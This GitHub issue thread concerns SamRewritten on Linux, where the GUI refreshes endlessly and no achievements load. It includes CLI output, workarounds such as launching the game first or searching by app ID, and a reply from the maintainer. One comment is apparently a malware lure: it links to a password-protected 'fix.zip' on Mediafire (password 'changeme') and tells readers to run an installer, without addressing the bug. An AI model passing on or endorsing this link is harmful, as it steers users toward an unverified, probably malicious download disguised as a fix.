### ISSUE TITLE
Permanent refresh (GUI) and no achievements for any games (GUI+CLI)

### ISSUE THREAD

**Issue by Neryss** [PaulCombal/SamRewritten-legacy#174]
Hello!

There seems to be a permanent refresh when using the GUI app, I get a "Not refreshing games because a refresh is already in progress" when trying to manually reload the game list despite letting it run for 20min.
Most of the games are missing and I can't see any achievements when clicking on a game.
Using the CLI, and trying to get the Terraria achievements list for example gives me:

```
./bin/launch.sh --ls 105600
[S_API] SteamAPI_Init(): Loaded '/home/neryss/.local/share/Steam/linux64/steamclient.so' OK.
Setting breakpad minidump AppID = 105600
Steam_SetMinidumpSteamID:  Caching Steam ID:  76561198151640435 [API loaded no]
No achievements for current game
Unable to get int stat STAT_BUCKETS_OF_BOLTS
Unable to get int stat STAT_GELATIN_WORLD_TOUR
Unable to get int stat STAT_BULLDOZER
Unable to get float stat STAT_FREQUENT_FLYER
Unable to get float stat STAT_MARATHON_MEDALIST
Unable to get int stat STAT_GOOD_LITTLE_SLAVE
Unable to get int stat STAT_TROUT_MONKEY
Unable to get int stat STAT_FAST_AND_FISHIOUS
Unable to get int stat STAT_SUPREME_HELPER_MINION
Unable to get int stat STAT_SLAYER_OF_WORLDS
GlobalStatsReceived_t failed! Enum: 11
GlobalAchievementPercentagesReady_t failed! Enum: 11
ACHIEVEMENTS
 API Name Name Description Unlock rate Unlocked Protected 
 

No stats found for this app...
```

I tried using the AUR and by compiling the repo.

Have a good day!

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CheesyChocolate** [comment]
It seems if you open the game first, then open samrewritten GUI app. you can open app the game achievement list and use it normally.

**Comment by Gimpiwu** [comment]
> It seems if you open the game first, then open samrewritten GUI app. you can open app the game achievement list and use it normally.

So in have to start the game normally from steam and then again on SAM ?

**Comment by Neryss** [comment]
Sorry for the late response. I've tried launching the game (I tried with Satisfactory this time) first, opening the GUI and searching the game but it isn't present.

However I also tried this procedure with Terraria which was already detected by samrewritten and it works now!

Are some games just not detected by default?

**Comment by Gimpiwu** [comment]
If you cant find it you can type the steamID into the search field and start the id for statisfsctory its 526870

**Comment by Neryss** [comment]
I just tested that and it works fine by searching it manually thanks! Is there a fix to the list not updating?

**Comment by PaulCombal** [comment]
If games are missing check https://github.com/PaulCombal/SteamAppsList . Like another user pointed out, if a game previously listed gets achievements it won't get refreshed. It's up to you community now, I have other things to look after now, have fun!

**Comment by Neryss** [comment]
Alright thanks for the informations, I'll take a look and help around!
Have a good day!
